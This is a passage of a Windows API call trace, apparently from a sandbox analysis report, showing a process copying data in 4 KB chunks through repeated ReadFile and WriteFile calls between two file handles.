[0092.901] SetLastError (dwErrCode=0x0) [0092.901] GetLastError () returned 0x0 [0092.901] SetLastError (dwErrCode=0x0) [0092.901] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.902] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.902] GetLastError () returned 0x0 [0092.902] SetLastError (dwErrCode=0x0) [0092.902] GetLastError () returned 0x0 [0092.902] SetLastError (dwErrCode=0x0) [0092.902] GetLastError () returned 0x0 [0092.902] SetLastError (dwErrCode=0x0) [0092.902] GetLastError () returned 0x0 [0092.902] SetLastError (dwErrCode=0x0) [0092.902] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.903] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.903] GetLastError () returned 0x0 [0092.903] SetLastError (dwErrCode=0x0) [0092.903] GetLastError () returned 0x0 [0092.903] SetLastError (dwErrCode=0x0) [0092.903] GetLastError () returned 0x0 [0092.903] SetLastError (dwErrCode=0x0) [0092.903] GetLastError () returned 0x0 [0092.903] SetLastError (dwErrCode=0x0) [0092.903] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.903] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.904] GetLastError () returned 0x0 [0092.904] SetLastError (dwErrCode=0x0) [0092.904] GetLastError () returned 0x0 [0092.904] SetLastError (dwErrCode=0x0) [0092.904] GetLastError () returned 0x0 [0092.904] SetLastError (dwErrCode=0x0) [0092.904] GetLastError () returned 0x0 [0092.904] SetLastError (dwErrCode=0x0) [0092.904] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.904] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.905] GetLastError () returned 0x0 [0092.905] SetLastError (dwErrCode=0x0) [0092.905] GetLastError () returned 0x0 [0092.905] SetLastError (dwErrCode=0x0) [0092.905] GetLastError () returned 0x0 [0092.905] SetLastError (dwErrCode=0x0) [0092.905] GetLastError () returned 0x0 [0092.905] SetLastError (dwErrCode=0x0) [0092.905] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.905] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.905] GetLastError () returned 0x0 [0092.905] SetLastError (dwErrCode=0x0) [0092.906] GetLastError () returned 0x0 [0092.906] SetLastError (dwErrCode=0x0) [0092.906] GetLastError () returned 0x0 [0092.906] SetLastError (dwErrCode=0x0) [0092.906] GetLastError () returned 0x0 [0092.906] SetLastError (dwErrCode=0x0) [0092.906] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.906] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.906] GetLastError () returned 0x0 [0092.906] SetLastError (dwErrCode=0x0) [0092.906] GetLastError () returned 0x0 [0092.906] SetLastError (dwErrCode=0x0) [0092.907] GetLastError () returned 0x0 [0092.907] SetLastError (dwErrCode=0x0) [0092.907] GetLastError () returned 0x0 [0092.907] SetLastError (dwErrCode=0x0) [0092.907] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.907] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.907] GetLastError () returned 0x0 [0092.907] SetLastError (dwErrCode=0x0) [0092.907] GetLastError () returned 0x0 [0092.907] SetLastError (dwErrCode=0x0) [0092.907] GetLastError () returned 0x0 [0092.907] SetLastError (dwErrCode=0x0) [0092.908] SetLastError (dwErrCode=0x0) [0092.908] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.908] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.908] SetLastError (dwErrCode=0x0) [0092.908] SetLastError (dwErrCode=0x0) [0092.908] SetLastError (dwErrCode=0x0) [0092.908] SetLastError (dwErrCode=0x0) [0092.908] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.908] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.908] SetLastError (dwErrCode=0x0) [0092.908] SetLastError (dwErrCode=0x0) [0092.908] SetLastError (dwErrCode=0x0) [0092.908] SetLastError (dwErrCode=0x0) [0092.908] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.908] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.909] SetLastError (dwErrCode=0x0) [0092.909] SetLastError (dwErrCode=0x0) [0092.909] SetLastError (dwErrCode=0x0) [0092.909] SetLastError (dwErrCode=0x0) [0092.909] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.909] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.909] SetLastError (dwErrCode=0x0) [0092.909] SetLastError (dwErrCode=0x0) [0092.909] SetLastError (dwErrCode=0x0) [0092.909] SetLastError (dwErrCode=0x0) [0092.909] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.909] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.909] SetLastError (dwErrCode=0x0) [0092.909] SetLastError (dwErrCode=0x0) [0092.909] SetLastError (dwErrCode=0x0) [0092.910] SetLastError (dwErrCode=0x0) [0092.910] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.910] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.910] SetLastError (dwErrCode=0x0) [0092.910] SetLastError (dwErrCode=0x0) [0092.910] SetLastError (dwErrCode=0x0) [0092.910] SetLastError (dwErrCode=0x0) [0092.910] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.910] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.910] SetLastError (dwErrCode=0x0) [0092.910] SetLastError (dwErrCode=0x0) [0092.910] SetLastError (dwErrCode=0x0) [0092.910] SetLastError (dwErrCode=0x0) [0092.910] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.910] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.911] SetLastError (dwErrCode=0x0) [0092.911] SetLastError (dwErrCode=0x0) [0092.911] SetLastError (dwErrCode=0x0) [0092.911] SetLastError (dwErrCode=0x0) [0092.911] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.911] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.911] SetLastError (dwErrCode=0x0) [0092.911] SetLastError (dwErrCode=0x0) [0092.911] SetLastError (dwErrCode=0x0) [0092.911] SetLastError (dwErrCode=0x0) [0092.911] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.911] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.911] SetLastError (dwErrCode=0x0) [0092.912] SetLastError (dwErrCode=0x0) [0092.912] SetLastError (dwErrCode=0x0) [0092.912] SetLastError (dwErrCode=0x0) [0092.912] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.912] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.912] SetLastError (dwErrCode=0x0) [0092.912] SetLastError (dwErrCode=0x0) [0092.912] SetLastError (dwErrCode=0x0) [0092.912] SetLastError (dwErrCode=0x0) [0092.912] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.912] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.912] SetLastError (dwErrCode=0x0) [0092.912] SetLastError (dwErrCode=0x0) [0092.912] SetLastError (dwErrCode=0x0) [0092.913] SetLastError (dwErrCode=0x0) [0092.913] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.913] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.913] SetLastError (dwErrCode=0x0) [0092.913] SetLastError (dwErrCode=0x0) [0092.913] SetLastError (dwErrCode=0x0) [0092.913] SetLastError (dwErrCode=0x0) [0092.913] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.913] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.913] SetLastError (dwErrCode=0x0) [0092.913] SetLastError (dwErrCode=0x0) [0092.913] SetLastError (dwErrCode=0x0) [0092.913] SetLastError (dwErrCode=0x0) [0092.913] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.913] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.914] SetLastError (dwErrCode=0x0) [0092.914] SetLastError (dwErrCode=0x0) [0092.914] SetLastError (dwErrCode=0x0) [0092.914] SetLastError (dwErrCode=0x0) [0092.914] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.914] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.914] SetLastError (dwErrCode=0x0) [0092.914] SetLastError (dwErrCode=0x0) [0092.914] SetLastError (dwErrCode=0x0) [0092.914] SetLastError (dwErrCode=0x0) [0092.914] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.914] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.914] SetLastError (dwErrCode=0x0) [0092.914] SetLastError (dwErrCode=0x0) [0092.915] SetLastError (dwErrCode=0x0) [0092.915] SetLastError (dwErrCode=0x0) [0092.915] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.915] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.915] SetLastError (dwErrCode=0x0) [0092.915] SetLastError (dwErrCode=0x0) [0092.915] SetLastError (dwErrCode=0x0) [0092.915] SetLastError (dwErrCode=0x0) [0092.915] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.915] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.915] SetLastError (dwErrCode=0x0) [0092.915] SetLastError (dwErrCode=0x0) [0092.916] SetLastError (dwErrCode=0x0) [0092.916] SetLastError (dwErrCode=0x0) [0092.916] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.916] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.916] SetLastError (dwErrCode=0x0) [0092.916] SetLastError (dwErrCode=0x0) [0092.916] SetLastError (dwErrCode=0x0) [0092.916] SetLastError (dwErrCode=0x0) [0092.916] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.916] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.916] SetLastError (dwErrCode=0x0) [0092.916] SetLastError (dwErrCode=0x0) [0092.916] SetLastError (dwErrCode=0x0) [0092.916] SetLastError (dwErrCode=0x0) [0092.916] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.917] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.918] SetLastError (dwErrCode=0x0) [0092.918] SetLastError (dwErrCode=0x0) [0092.918] SetLastError (dwErrCode=0x0) [0092.918] SetLastError (dwErrCode=0x0) [0092.918] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.918] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.918] SetLastError (dwErrCode=0x0) [0092.918] SetLastError (dwErrCode=0x0) [0092.918] SetLastError (dwErrCode=0x0) [0092.918] SetLastError (dwErrCode=0x0) [0092.918] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.918] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.918] SetLastError (dwErrCode=0x0) [0092.918] SetLastError (dwErrCode=0x0) [0092.918] SetLastError (dwErrCode=0x0) [0092.919] SetLastError (dwErrCode=0x0) [0092.919] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.919] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.919] SetLastError (dwErrCode=0x0) [0092.919] SetLastError (dwErrCode=0x0) [0092.919] SetLastError (dwErrCode=0x0) [0092.919] SetLastError (dwErrCode=0x0) [0092.919] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.919] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.919] SetLastError (dwErrCode=0x0) [0092.919] SetLastError (dwErrCode=0x0) [0092.919] SetLastError (dwErrCode=0x0) [0092.919] SetLastError (dwErrCode=0x0) [0092.919] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.919] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.920] SetLastError (dwErrCode=0x0) [0092.920] SetLastError (dwErrCode=0x0) [0092.920] SetLastError (dwErrCode=0x0) [0092.920] SetLastError (dwErrCode=0x0) [0092.920] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.920] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.920] SetLastError (dwErrCode=0x0) [0092.920] SetLastError (dwErrCode=0x0) [0092.920] SetLastError (dwErrCode=0x0) [0092.920] SetLastError (dwErrCode=0x0) [0092.920] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.920] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.920] SetLastError (dwErrCode=0x0) [0092.921] SetLastError (dwErrCode=0x0) [0092.921] SetLastError (dwErrCode=0x0) [0092.921] SetLastError (dwErrCode=0x0) [0092.921] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.921] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.921] SetLastError (dwErrCode=0x0) [0092.921] SetLastError (dwErrCode=0x0) [0092.921] SetLastError (dwErrCode=0x0) [0092.921] SetLastError (dwErrCode=0x0) [0092.921] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: 